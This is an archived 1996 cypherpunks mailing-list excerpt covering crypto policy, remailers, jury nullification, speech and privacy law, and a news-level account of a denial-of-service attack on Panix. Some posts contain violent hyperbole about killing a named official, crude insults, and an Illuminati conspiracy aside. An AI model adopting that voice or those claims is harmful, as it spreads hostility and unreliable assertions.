Box14:It's not hard to find two large PRIME NUMBERS P and Q. But if I hand you their PRODUCT, PQ, your supercomputer will never find P and Q again. (SOB!) Box15:Under RSA, each user gets a 160 digit number, N, which is the product of two large primes, P and Q. Box16:The number N is made public, while P and Q remain secret. A simple formula completes the encryption, which can't be cracked without FACTORING! (ngh) Box17:The National Security Agency didn't like this! The spy bureau wants the ability to crack any code! (Your assignment Seymour: FACTOR FASTER!!) Box18:But spies aren't the only ones who need cryptography! Anyone who transmits ELECTRONIC DATA wants to secure the information's integrity. (Why? What? This is an OPEN SOCIETY!) Box19:Unbreakable public-key code would effectively Protect money transfers from tampering Shield sensitive business data from the competition Immunize software against viruses (Allow us to gossip securely by E-Mail!) Box20:So-After years of resisting Public-Key systems, the government in 1991 finally endorsed one as a new NATIONAL STANDARD. (I WAS WRONG! EMBRACE ME!) Box21:Unlike RSA, however, the government's DSA (Digital Signature Algorithm) depends on a single, government-issue PRIME NUMBER. (Take a P! Not any P!) Box22:Within months, mathematicians had shown how this could give the government, and the government alone, the ability to BREAK the code-and so the argument continues... (Trust, Where is the trust??) From gbroiles at netbox.com Thu Sep 12 03:25:35 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Thu, 12 Sep 1996 18:25:35 +0800 Subject: jury nullification/selection Message-ID: <2.2.32.19960912075929.00691470@pop.ricochet.net> Sorry if I was too terse earlier. I hadn't intended to start a big FIJA dustup. 
I think that government sleaziness is not only useful in a true nullification argument ("he's guilty but you should acquit anyway") but where it reflects on the credibility of testimony and the prosecution's case in general. It's easy to imagine a prosecution which rests on the testimony of people who lie every day (criminally involved informants, jailhouse informants, and undercover cops) and/or real evidence which was gained through the use of subterfuge and trickery (like wiretap/body wire evidence). The idea is to make the government look sleazier and trickier than the defendant(s) and the defense witnesses. If the government's evidence ends up being tainted directly or indirectly by lying, trickery, etc., then the defense can argue "Hey. You can't trust anyone who got up on that stand and talked to you. And if you don't know who to trust and you think everyone's lying, the government's got no case. And if they've got no case, the judge will tell you that you must acquit." So I think that public distaste and discomfort with weirder and sleazier tactics on the part of cops can be (and is) discussed and used and "voted on". "Not guilty" doesn't necessarily mean "innocent", sometimes it means "The prosecution didn't have enough evidence I thought I could trust." And yes, I agree that even mentioning nullification during voir dire will probably get you kicked off of a jury; and I think that's partly because one party or the other will be scared of nullification, and partly because the term "jury nullification" makes people think of FIJA and associated loons. Nobody wants a loon on the jury. (I don't think everyone who argues for nullification is a loon, but some of them sure are - and there's no good way to figure out whether someone's a loon or not in the middle of jury selection.) 
And I also agree that the jury selection process tends to select away from a true cross-section of society; but the few easily available examples (big trials like OJ or the Menendez Bros. or Wm. Kennedy Smith or whoever) are poor examples because they're not typical. Trials where lots is at stake (death penalty or celebrity defendant or big $ civil trials) tend to have longer processes (which weed out everyone who isn't incredibly boring) but it's not at all uncommon to pick a jury in a morning or in a day or two. In federal court, the judge usually questions the jury instead of the attorneys (which is faster), and may or may not ask questions that the attorneys have suggested. Also, sometimes one side or the other will *want* especially analytical or technical or well-trained jurors. Attorneys want to pick a jury they can persuade, but they also want to pick a jury that can understand their theory of the case. So I guess my point is that while the jury system isn't perfect, it is in some ways a much more direct way to "vote" on how things work in the judicial and law enforcement systems. I think it's more immediately and directly democratic than the electoral system. All of the legal bullshit aside, it's possible to think about trials as a way for people who have some sort of problem (they've been injured or accused of a crime or whatever) to tell a group of uninvolved people about the problem and ask them what the right thing to do is. Yeah, that's really oversimplified, but I think that what juries do is important and that what they do has a political and a moral dimension even if attorneys aren't supposed to talk about it during argument. -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." 
http://www.io.com/~gbroiles | | From amnesia at chardos.connix.com Thu Sep 12 03:32:25 1996 From: amnesia at chardos.connix.com (Anonymous) Date: Thu, 12 Sep 1996 18:32:25 +0800 Subject: Child porn as thoughtcrime Message-ID: <199609120442.AAA27448@chardos.connix.com> Chuck Thompson writes: > > Well Andrew, pornography is meant to lead to arousal, which can lead to > aggression, which may lead to abuse. It's a fairly common path according to > what I've read on deviancy. Going into a bank can lead to casing out the joint, which may lead to a heist. Should this make the possession of pictures of banks illegal? I don't think that anyone here is advocating kiddie porn. The problem that TCM pointed out is that in fighting kiddie porn, legislators have started banning _thoughts_ that _could_ lead to child abuse. This is one great leap forward into the police state. > Following is one association's opinion, but > don't stop there, read for yourself what some of the deviants themselves > have to say: You're seeing the trees and missing the forest. It could be any activity, say the abuse of animals, that winds up being used as a wedge to create the police state. If the government started tattooing red 'P's on the foreheads of convicted pedophiles, would anyone notice the irony? Bobo From schmidt at pin.de Thu Sep 12 03:37:05 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Thu, 12 Sep 1996 18:37:05 +0800 Subject: Hacking Mobil Telephone System ? In-Reply-To: <32371250.3F54BC7E@systemics.com> Message-ID: > > ... but the semi automatics they carry are not much different to ones US > cops have. I thought the US cops also use H&K MP5 or such things. The same as in Germany :) > And *they'll* decide what sort of deal *they* want to offer. 
They did > say the money could be donated to any non-profit organisation, so this > covers a wide range of organisations (your school or university perhaps, > or computer society, or even the Church of Scientology, The Vatican, > Mitre Corp, NFL, etc. etc.). I wonder if Radikal is a non-profit :-) Taken in account that they are leftist, they should be non-profit ;) -stephan From paul at fatmans.demon.co.uk Thu Sep 12 06:31:18 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Thu, 12 Sep 1996 21:31:18 +0800 Subject: Ban CU Secrecy, Keep TLA's! Message-ID: <842468796.562.0@fatmans.demon.co.uk> > > Mr David Bickford, the first British intelligence lawyer > to speak publicly in the UK, said at a conference in > Cambridge, 50 miles north-east of London, that there > "appears to be no justification at all for offshore bank > secrecy other than to protect the criminal". Apart from the confidentiality of the customer, bank, all those they trade with and all other interested parties, well then, they can`t be that important can they > > He said "offshore bank secrecy can and must be abolished" > and "the UK should be the first to abolish this secrecy > given their control of their dependent territory offshore > centres". So because we choose to maintain a statist and totalitarian empire we had better set an example of how to do it to the rest of the world??? > > Mr Bickford, who now runs an international legal > consultancy, said "endemic corruption" is caused by > offshore secrecy, and it is "difficult to see why it is > tolerated by any other than those with an unlawful > disposition". It is also difficult to see why I don`t go round to mr. Bickfords house and kill him, his dog, and his pet hamster, but I don`t, nor do I intend to, to say that we cannot see a reason for people wanting privacy is no justification for legislation that prohibits such privacy. 
> He said allowing countries to maintain offshore banking > secrecy is "a classic example of the corruptive influence > of organised crime". It is a classic example of privacy and freedom in a free society (not that I believe Britain falls into this category) Has anyone got this guys IQ, it`s probably the first ever negative IQ in the history of the world, cheer everyone, its a historic find. Mr. Bickford, I believe you to be a fuckwit, feel free to prove me wrong.. Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From perry at alpha.jpunix.com Thu Sep 12 07:17:27 1996 From: perry at alpha.jpunix.com (John Perry) Date: Thu, 12 Sep 1996 22:17:27 +0800 Subject: New type2.list/pubring.mix Message-ID: <199609121101.GAA18549@alpha.jpunix.com> I just updated the type2.list/pubring.mix combination on jpunix.com to reflect the disappearance of the ncognito remailer. I've been getting nothing but bounces and the owner doesn't seem to be around to fix it. The updated lists can be obtained by WWW from www.jpunix.com and by anonymous FTP from ftp.jpunix.com. -- John Perry KG5RG perry at alpha.jpunix.com PGP-encrypted e-mail welcome! WWW - http://www.jpunix.com PGP 2.62 key for perry at jpunix.com is on the keyservers. From adam at homeport.org Thu Sep 12 09:27:45 1996 From: adam at homeport.org (Adam Shostack) Date: Fri, 13 Sep 1996 00:27:45 +0800 Subject: What is best policy paper on crypto? 
In-Reply-To: Message-ID: <199609121242.HAA05004@homeport.org> Declan McCullagh wrote: | I happen to know that an influential Congressperson will be meeting with | some Cato folks tomorrow morning, so I'm assuming this isn't an idle | request. | | -Declan The NAS report, despite a few silly points, does push for liberalization of the export regime, standardization, a switch to an 'assume export' stance, states that the debate can be carried out in public, and that classified information is not needed, and suggests that crypto can help reduce many threats to Americans. It does not suggest abolishing the ITARs, and suggests consideration of a law criminalizing the criminal use of crypto. It is a balanced report, and has NSA, and attorney generals on it. Otherwise, I'd go with some of Whit's testimony before Congress. (Saw a presentation by Herb Lin yesterday at MIT.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From julf at penet.fi Thu Sep 12 10:03:58 1996 From: julf at penet.fi (Johan Helsingius) Date: Fri, 13 Sep 1996 01:03:58 +0800 Subject: na673130@anon.penet.fi gone [Anonymous service rejected your mail.] (fwd) Message-ID: <1.5.4.32.19960912122408.0073d650@pentu.penet.fi> At 21:49 96/09/11 -0400, Andy Dustman wrote: >Looks like Spambo either deleted his id or Julf pulled the plug on him. I pulled his plug. But his real address has been on this list several times. Julf From jseiger at cdt.org Thu Sep 12 11:44:24 1996 From: jseiger at cdt.org (Jonah Seiger) Date: Fri, 13 Sep 1996 02:44:24 +0800 Subject: Sen. Burns' statement on postponement of Crypto vote today. Message-ID: As you may have heard by now, the Senate commerce committee markup of the Burns/Leahy "Pro-CODE' bill, originally set for today, has been postponed. Indications from the Commerce Committee staff are that this was largely due to scheduling issues, although end-of-the-session politics are also playing a role. 
Both the Committee staff and Senator Burns himself (see note below) have said they are committed to holding a markup before the end of the session. We expect more information early next week and will post updates as soon as new information becomes available. Senator Burns asked us to forward the following note to the net.community: >X-POP3-Rcpt: jseiger at mailserver >From: Conrad_Burns at burns.senate.gov >Date: Thu, 12 Sep 96 09:55:35 EST >To: jseiger at cdt.org >Subject: Open Letter to the Internet from Senator Burns > > The Commerce Committee markup on Pro-CODE, S. 1726, that we had > expected to have held on Thursday, September 12 has been postponed. I > am fully committed to taking Pro-CODE to markup, out of committee and > onto the floor of the Senate in this Congress. I believe that this > legislation is vital to ensuring the continued strength of America's > high-tech community and the privacy of its citizens. I would like to > thank the many thousands of Netizens who have expressed their support > for Pro-CODE. > > Sincerely, > > U.S. Senator Conrad Burns > Please keep your phone calls coming to the Senate Commerce Committee members offices, and be sure to sign the petition at http://www.crypto.com/petition/. A coalition alert with more information will be posted soon. 
Jonah ** THE FIGHT FOR FREE SPEECH ONLINE CONTINUES TO THE SUPREME COURT ** It's not too late to be a part of history -- Join the Lawsuit -- -- Jonah Seiger, Policy Analyst Center for Democracy and Technology 1634 Eye Street NW, Suite 1100 Washington, DC 20006 PGP Key via finger (v) +1.202.637.9800 http://www.cdt.org/ (f) +1.202.637.0968 http://www.cdt.org/homes/jseiger/ From talon57 at well.com Thu Sep 12 11:59:27 1996 From: talon57 at well.com (Brian D Williams) Date: Fri, 13 Sep 1996 02:59:27 +0800 Subject: [BOOK] Competitive Intelligence Message-ID: <199609121420.HAA14936@well.com> Competitive Intelligence "From Black Ops to Boardrooms- How Businesses Gather, Analyze, and use Information to Succeed in the Global Marketplace." ISBN 0-684-81074-3 Simon and Schuster ($24.00) Preface: Being a Hero and not a Bum Part One: What is Competitive Intelligence? 1.) The Rise of Competitive Intelligence 2.) What Competitive Intelligence can do for your company: Information vs Intelligence 3.) Why most managers are still stuck in the information age Part Two: Real-World Competitive Intelligence 4.) The Intelligence Cycle 5.) Planning and Direction 6.) Collection 7.) Analysis 8.) Dissemination 9.) Mergers and Acquistions 10.) Benchmarking and Competitive Intelligence 11.) How the Japanese Perform Competitive Intelligence 12.) Competitive Intelligence in other Countries 13.) Building a Competitive Intelligence System Part Three: Issues, Opportunities, and the Future 14.) Justifying the cost of Competitive Intelligence 15.) Using Competitive Intelligence in the European Union 16.) Ethics 17.) The New Gatekeepers 18.) Why the U.S. Government must get involved in Competitive Intelligence 19.) 
Competitive Intelligence-The Next Generation Glossary of Competitive Intelligence From cme at cybercash.com Thu Sep 12 12:20:38 1996 From: cme at cybercash.com (Carl Ellison) Date: Fri, 13 Sep 1996 03:20:38 +0800 Subject: ISODE Consortium X.509 Certification system Message-ID: <3.0b11.32.19960912105914.0054f7b0@cybercash.com> Bill, thanks for forwarding this to me. It really bothers me whenever I see someone mouthing platitudes about certificates, like: >The ITU-T, through X.509, recommend strong authentication based on public >key cryptosystems as the basis for providing secure services. The ISODE >Consortium uses X.509 as the core of its security strategy. >X.509 provides a flexible, scaleable and manageable algorithm-independent >authentication infrastructure, which can be used as the basis for a wide >range of security services such as message encryption and access control. Fact is, identity certification (which is what X.509 gives) is neither necessary nor sufficient for providing secure services -- and there's nothing magic about X.509. There are marketeers, however, who want the world to believe that the generation and use of X.509 certs will somehow give you security -- so they can sell machinery or a service which makes those certs. - Carl P.S. My USENIX paper giving the case against certification authorities is on-line now at = +------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme | | PGP 2.6.2: 61 E2 DE 7F CB 9D 79 84 E9 C8 04 8B A6 32 21 A2 | +-Officer, officer, arrest that man. He's whistling a dirty song.--+ From attila at primenet.com Thu Sep 12 12:26:01 1996 From: attila at primenet.com (attila) Date: Fri, 13 Sep 1996 03:26:01 +0800 Subject: Bubba Bottoming out on Cocaine Paranoia? In-Reply-To: Message-ID: <199609121502.JAA19550@InfoWest.COM> In , on 09/12/96 at 08:16 AM, Chip Mefford said: = > 2. 
the rewrite of history to reflect not only the = > politically correct views, but to reflect history as = > the elite wish to see it --even to the point of rewriting = > quotations of Thomas Jefferson to suit their purpose. = > = Can you give a clear example of this?? = Just asking the most blatant one was the rewording of Jefferson's words for the equality of all men about two years ago. As we know, Jefferson was all for freedom, and had a "God bless you, you're a slave" attitude, but he was clearly not for the equalization. when that one came out of washington, several papers had a hard time with it, but I have seen it since. I have been collecting Jefferson quotes for years; frankly, I always considered the Dems were off base: Jefferson was the Republican --leaving Hamilton and his Federalists as pawns of the Illuminati as advocates of the independent Federal Bank (the worst of the Rothschilds (Maurice, I think) who made the statements regarding control of the government by control of the money was in his prime around 1800). I am not a dedicated Jeffersonian scholar, but he has been the corner stone of my (now long blown) faith in our government. I would a complete set of Jefferson's works --if, and only, if I could find a good edition published over a 100 years ago. secondly, Jefferson is now interpreted as being the great enfranchiser, which is not even close to his view. Jefferson's writings clearly emphasize that the electorate should be comprised of the landed and merchant class; secondly, it was Jefferson's statement that the electorate, and therefore the juries should be composed "...of a well educated and informed citizenry." Jefferson was interested in an electorate which was of substance and possessing of a stake in America. One of the clear principles of Jeffersonian thought was that jury, beyond the requirement of guilt beyond a reasonable doubt, was to _vote its conscience_. 
Jefferson was responsible for including the constitutional language which makes this possible, even today, despite instructions from judges who could care less about the intent of the constitution and are treating the accused as nothing more than cattle on the way to the abattoir --if they are not guilty this time they will be next time, so why waste further time --sometimes known as "collateral damage." = > Why has it gone this far? because Joe-Six-Pack will sell = > all his freedom in return for the promised security. who is = > the Judas goat? the captive press. = > = Actually, being a "Joe six pack" my own damn self, I'd have to say = that this is simply not the case. It is Joe six pack who makes up the = body of the NRA and most other freedom watch dog organizations. = Just for yer information, the pendulem has been swinging very much = the other way, with 36 or 37 states recently following Floridas lead = on concealed weapons carries. Not only that, but even NPR has even = admitted that it has been effective. Agreed on the restoration of concealed weapons rights which had been regulated out of existence. Granted, Joe-Six-Pack may not be the perfect analogy, but I refer to America's working class, blue collar and the grunts of the white collars as Joe-Six-Pack --maybe I should say Joe-Couch-Potato. the class" referenced is a collection of many levels --what they have in common is they work and then confrom to the current norm of 7.2 hrs/day in front of the tube which becomes their entire source of information --THEY will sell out from ignorance. If you refer to Joe-Six-Pack as the the classic Southern red neck, any attempt to limit their freedom, particularly the right to a pickup truck with a gun rack, and their handguns --that's a very different situation. and that extends to small town westerners, like myself, and to the plains. 
I grew up on a farm, went to Harvard, joined the spooks for six years of a bloodpath, bounced around the world in different fields, and I am back in a very small community in the high desert: 100 families. Noone around here questions my bad attitude --the admissions requirements are at least 5 kids and 2000 rounds. However, I think Joe-Six-Pack, in this constrained social set, for the vast majority would sell out on freedom of cryptography. they do not understand it, particularly against the onslaught of the pinko-liberal captive media. Our job is to educate them --and not with defiant rhetoric (such as mine). As for concealed weapons permits, bank robberies should certainly drop --all it would take is one cowboy (and I'll volunteer) and anything other than a large coordinated operation is in serious trouble. One unsuspected, mean and surly patron with a .357 who seriously knows how and when to use same is very effective. On the other hand, I do not recommend carrying an assault rifle on a sling over your shoulder to visit the bank.... The simple (I think) point I was trying to make was: the vast majority of our U.S. citizens would acquiesce to the deployment of federal troops in return for security, rather than being armed, Posse Comitas not withstanding, to wipe crime off the streets. The point could even be made: the troops might as well be doing something useful rather than sitting around their bases; we do have a rather large standing army --unfortunately, they would become poorly trained and poorly disciplined --and could easily be part of the massive corruption in our cities (and every other government over many people). Frankly, we should all vote in a _free_ cyberspace; forget the current system of choosing party loyalists and presidential electors. The application of a military mentality on the streets is not my idea of law and order --they could kill off the majority of the crime by legalizing all drugs and dispensing them in clinics. 
Britain reduced their second story (burglary) crime rate by over 60%; they did find they had a great many more addicts than the thought, however. A second benefit is that it takes some of the mystery and challenge out of drugs --however, be prepared for the alcohol problem, although that effect would be significantly less than the current social cost of having 10% of the male black population in lockdown. no, my bottome line is the Bubba has sunk to bottom with paranoia, both he and the elite money interests which jerk all of the politicial habituites who depend on their soft money for their campaings and who wish to participate at the trough of influence and greed (ever see someone retired after many years in Washington without a bundle). --attila -- one of the few things we all share: the utter, corrosive contempt for our elected officials. From liberty at gate.net Thu Sep 12 12:39:02 1996 From: liberty at gate.net (Jim Ray) Date: Fri, 13 Sep 1996 03:39:02 +0800 Subject: Getting the word "GAK" into common usage Message-ID: <199609121522.LAA106562@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Thu Sep 12 11:20:55 1996 cypherpunks: As most of you know, I have been trying to bring "our" word, "GAK" into common usage, as opposed to the "key-escrow" Newspeak proposed by some (unnamed) big-government bureaucrat, and unfortunately adopted in most discussions of cryptography policy, (especially those outside this forum) in spite of the true English meaning of the word "escrow." There is a resource called "Infomania," which you can learn about by sending a blank message with the subject "help" to . The service provides, via email, services that are normally only available to people who have real internet acess (ie, "WHOIS,") but there is also a heavy bias toward humor. 
Sending it the subject "GEEK," for example, returns the current version of the Code of the Geeks. Sending the subject CHEF with some dry, boring text (such as this message) in the message body returns you a truly hilarious transmogrification. :) Anyway, I have been in contact with Jason Fesler, who administers the site for Infomania [a firm which produces film separations for commercial grade printers and which provides this free service] about putting in a new command, "GAK," which will return to senders whatever the current U.S. govt. "key-escrow" Newspeak bigbrother anti-privacy proposal(s) is/are. (ie. clipper1, clipper2, son of clipper etc.). He has agreed that if we can supply a script or url or gopher page or something of that sort to interface it to, and a person to maintain it whenever the policy changes yet again (the hard part) he will do it. I would, of course, expect a bit of cypherpunkly commentary to accompany the text. Perhaps this information already exists (likely it does) on some page, and if you know where and think it is stable and well-updated, please email me privately, and I will try to put the owner of the site in touch with Jason. I am Bccing him with this message. Thanks for your help. JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 I will generate a new (and bigger) PGP key-pair on election night. 
http://www.shopmiami.com/prs/jimray ___________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjgqXW1lp8bpvW01AQF49wP8Ci8D9blF898dNaFsKesX311qT2MO88zr xM11xZ0g1Ui4ahv3yB4jo6qqv4Z9InjNpiOk6wxcsXUPPtn6UNCBOTdos/DCk/SO SSOupiLA48gBHfoCIMN2f/+hGGM4BcuYC5wQ9rgJrTeiY8nQX18hJxKDxujn7z0A pbvTrSRQozY= =rA5a -----END PGP SIGNATURE----- From ac at twinds.com Thu Sep 12 12:39:45 1996 From: ac at twinds.com (Arley Carter) Date: Fri, 13 Sep 1996 03:39:45 +0800 Subject: TWA 800 - hit by an unarmed US missile? In-Reply-To: Message-ID: On Mon, 9 Sep 1996, Vince wrote: > > > > Is the press on top of this? > > -- Vince > > When did the press acquire the role of defender of truth, justice, honesty or integrity? Cheers: -arc Arley Carter Tradewinds Technologies, Inc. email: ac at twinds.com www: http://www.twinds.com "Life is a journey to adventure and discovery, not a problem to be solved." -me From thevillage at void.gov Thu Sep 12 12:48:41 1996 From: thevillage at void.gov (#6) Date: Fri, 13 Sep 1996 03:48:41 +0800 Subject: PANIX.COM down: denial of service attack Message-ID: <323835AE.6EA6@void.gov> WSJ 9/12/96 Paraphrasing: Panix has been under attack for the last week by someone flooding their server with bogus "requests for information" [see below] ... The attack(s): * "Have rendered almost defenseless the small NY company" * "...began late Friday afternoon ... were still continung yesterday" * have targeted "computers that control WWW pages, store e-mail, and still others that link Internet addresses to Panix subscribers." "The hacker [sic] has been sending up to 150 requests a second to Panix's computers, seeking to establish a connection ... the requests, presumably generated by a malicious computer program, contain fake Internet addresses, which the computer must sort out before they can discard them. The computers have choked under the deluge." "As to who might be targeting Panix, the firm's Mr. 
Rosen speculated it could be someone upset by the fact that the site hosts, free, the Web site for Voters Telecommunication Watch...." From varange at crl.com Thu Sep 12 13:08:34 1996 From: varange at crl.com (Troy Varange) Date: Fri, 13 Sep 1996 04:08:34 +0800 Subject: Bubba Bottoming out on Cocaine Paranoia? In-Reply-To: <199609121502.JAA19550@InfoWest.COM> Message-ID: <199609121637.AA08784@crl11.crl.com> Are you familiar with the Jefferson Bible? It's an excerpt and rearrangement of the gospels to produce a more liberal effect. It shows that Thomas Jefferson was into interpretation rather than doctrinaire discipline. And rather than "dispensing drugs in clinics," why not simply scrap the drug laws entirely? People have a *right* to do as they please with their bodies. From nobody at cypherpunks.ca Thu Sep 12 13:50:06 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Fri, 13 Sep 1996 04:50:06 +0800 Subject: Child Porn as Thoughtcrime Message-ID: <199609121707.KAA12179@abraham.cs.berkeley.edu> Rick Smith wrote: > : ...the "little girls in leotards" case was only a few years ago, etc.) > > Don't know about that one. Is it illegal for little girls to be > photographed in leotards now? "Nutcracker" is X rated? Move over, > Bambi. But this proves precisely Tim's original point, that child pornography is a thoughtcrime. Here's a working definition of child pornography at the end of the millennium: it's a picture of a child, in the hands of a pedophile. Pictures of girls in leotards are not child pornography per se, but if you think evil thoughts while watching them, then they become child pornography. What got Stephen Knox in trouble was leaving so much evidence that he was thinking those evil thoughts.
From jya at pipeline.com Thu Sep 12 13:50:07 1996 From: jya at pipeline.com (John Young) Date: Fri, 13 Sep 1996 04:50:07 +0800 Subject: XPA_nix Message-ID: <199609121743.RAA13735@pipe3.t1.usa.pipeline.com> WSJ and WaPo have reports on Panix-jamming by info-request bombardment, and Bell Labs security expert Bill Cheswick's attempt to solve it. Cheswick opines,"This is the first major attack of a kind that I believe to be the final Internet security problem." ----- http://jya.com/xpanix.txt XPA_nix From admin at superhot.com Thu Sep 12 13:52:12 1996 From: admin at superhot.com (Admin) Date: Fri, 13 Sep 1996 04:52:12 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] Message-ID: <199609121640.KAA19040@rintintin.Colorado.EDU> At 09:34 PM 9/11/96 -0400, you wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >On Wed, 11 Sep 1996, Admin wrote: > >> >This is an absurd and inaccurate analogy. The mailBot simply pushes >> >*mailto:* tags that people have willingly placed on their public websites. >> >They invite the mail so a more accurate analogy would be that City Hall puts >> >up a public suggestion box and invites comments. The bot then puts one, and >> >only one, unsigned anonymous suggestion into the box. It then goes on to the > >You're sending out messages, inviting people to visit your web site, but >you're using anonymous remailers because... you don't want people to know >who you are? Perhaps he's sending out through the remailers...because he can. Its open to the public. Or perhaps he's trying to get the word out about remailers also, or perhaps no one but he knows why, and why is unimportant. You can always make your remailers a private, pay per use club. Then you could control all the *whys* *whens* and *hows*. >Then why invite them to your site (or even have a site)? It's >like if I sent out postcards to people with no return address saying, >"Please stop by 1313 Mockingbird Lane for snacks and refreshments. Signed, >A Friend". 
(Note, this is not my real address.) >Only in this case the >postcards don't have any stamps so the people who receive them have to pay >the postage. Which is precisely what you're doing: Sending someone e-mail >costs them time and it often costs them money. These people have invited the email, and the associated expense, by placing a public email-to: button on their public www page. A more acurate analogy, and to the point, would be if a business sends you a postage pre-paid business reply card, that is blank, and invites your comments on the card. They can hardly complain of the expense when people actually send it in, even if they don't like the comments. >Sending it through an >anonymous remailer accomplishes four things: 1) People can't complain to >you to stop sending them mail. Seems anyone who followed the link can complain to the appropriate source. >2) It costs us, the International Secret >Cabal of Anonymous Remailer Operators, time and money for no good reason, >because you are sending anonymous mail and not making yourself anonymous. Didn't see any disclaimers on the remailers requiring a *good reason* to use them. Who would be this Judge of Sufficiently Good Reason? Perhaps you can write an AI piece that can auto-detect good reason from *no good reason*... >3) You're pissing off a bunch of people, and the only ones they can take >their frustrations out on or complain to is us. What is the ratio of *pissed off people* to not pissed off people. Likely less than 0.5% based on how many messages the Cpunks claim went out in a day. >4) It's giving us a bad >rap, man, and that's the *last* thing the remailer net needs now. The saying goes...There is Heat in the Kitchen... > >I could care less about your little applet, or what you have to say; in >the words of Thomas Jefferson, "it neither breaks my leg nor picks my >pocket." Until, that is, you start sending it through my remailer, and >*then* you start picking my pocket. 
>The remailers of the world don't exist >to provide non-anonymous anonymous advertising, which you could do just as >well on your own sending forged e-mail headers from netcom. Now now... forgery is a no-no. And someone always has the freedom to give up their anonymity whenever they choose. > >Andy Dustman / Computational Center for Molecular Structure and Design / UGA >===== For PGP public key: finger andy at neptune.chem.uga.edu | pgp -fka ===== >Sure, the Telecomm Act will create jobs: 100,000 new thought-cops on the net >http://charon.chem.uga.edu/~andy mailto:andy at CCMSD.chem.uga.edu <}+++< <>________________Lowest_Priced_Long_Distance__________________<> ||Long Distance 9.9¢/min |Helping hardworking people || ||9.9¢ Anytime, Anywhere in US! |like yourself pay the || ||Free sign-up, 6 second billing |lowest possible price for || ||http://www.superhot.com/phone |high quality LD service. || <>-----------------------1_303_692_5190------------------------<> From frissell at panix.com Thu Sep 12 14:00:18 1996 From: frissell at panix.com (Duncan Frissell) Date: Fri, 13 Sep 1996 05:00:18 +0800 Subject: PANIX.COM down: denial of service attack Message-ID: <2.2.32.19960912175446.008bf064@panix.com> At 09:09 AM 9/12/96 -0700, #6 wrote: >WSJ 9/12/96 > >Paraphrasing: > >Panix has been under attack for the last week by someone flooding >their server with bogus "requests for information" [see below] ... Even though service has suffered, Panix is still useable. Until I read the MOTDs on Tuesday, I thought it was just normal flakiness.
DCF From declan at well.com Thu Sep 12 14:02:58 1996 From: declan at well.com (Declan McCullagh) Date: Fri, 13 Sep 1996 05:02:58 +0800 Subject: Fear of Flying -- from HotWired Message-ID: http://www.hotwired.com/netizen/96/37/special3a.html 12 September 96 HotWired, The Netizen Fear of Flying by Declan McCullagh (declan at well.com) Washington, DC, 11 September John Gilmore, co-founder of the Electronic Frontier Foundation, knows firsthand how drastically airports in the United States are altering their policies in response to the nation's perceived vulnerability to terrorists. When Gilmore opened his laptop for inspection by airport personnel at San Francisco International last month - as requested - but refused to turn the machine on, the cops were called. When he then refused to show identification to airport police, "they put the handcuffs on me and hauled me off," he told The Netizen. The cops took Gilmore to a back-room office. "They tried to ask me questions. I said I wanted to speak to my lawyer. They kept asking me questions anyway," he says. Airport police arrested Gilmore even though, according to the FAA, "there is currently no prohibition against allowing someone on an aircraft" without identification. Gilmore's arrest came after President Clinton tightened airport security in response to the TWA Flight 800 disaster and the Atlanta Olympic Games bombing. Now the anti-terrorism drumbeat in the nation's capital is starting again, and it's louder and more ominous than ever. It reached a fevered pitch Monday, when Clinton called for an increase of more than one billion dollars to be spent on anti-terrorism measures, especially airport security. Clinton based his request on the unsurprising recommendations of a commission created by executive order in August, staffed by spooks and headed by Vice President Gore. 
The group's proposal includes a plan allowing the CIA and FBI to "develop a system" to screen passengers who fit certain profiles as potential terrorists. David Sobel, a lawyer with the Electronic Privacy Information Center, called the White House proposal "a realization of Big Brother concerns people have about computer technology." The proposal would allow the FBI and CIA to couple their databases with those of the airlines. "There are going to be massive databases that will track our actions and activities. If you think of increased capabilities to collect information, it's even scarier," Sobel said. A former US senator agrees. At a Cato Institute terrorism conference yesterday, Malcolm Wallop said: "In the year and a half since the terrorism debate began, all the legislation considered would do little or nothing to stop or deter terrorism. These measures do more to crack down on Americans than terrorists. "A bloody nose does not warrant an exponential expansion of federal government authority," argued Wallop, now the chairman of the Frontiers of Freedom Institute. Over lunch at the conference yesterday afternoon, former CIA director James Woolsey responded with some seemingly gratuitous anti-Net rhetoric. Terrorists may use biological weapons like anthrax, he said. "Anthrax is colorless, odorless, and has a 90 percent lethality. One gram has 100 million lethal doses." Then Woolsey delivered the zinger: "The knowledge of how to make anthrax is widely available, including on the Internet." Not content to let bad enough alone, Woolsey added that the government can't allow netizens to use data-scrambling software like Pretty Good Privacy that the spooks can't break. He said the threat of terrorism will "require us to have a key escrow system" where keys "for complex algorithms [will] be placed in such a way that the government" will have access to them. "You can accommodate industry a lot, but the principle is: you got to get to the key," Woolsey said. 
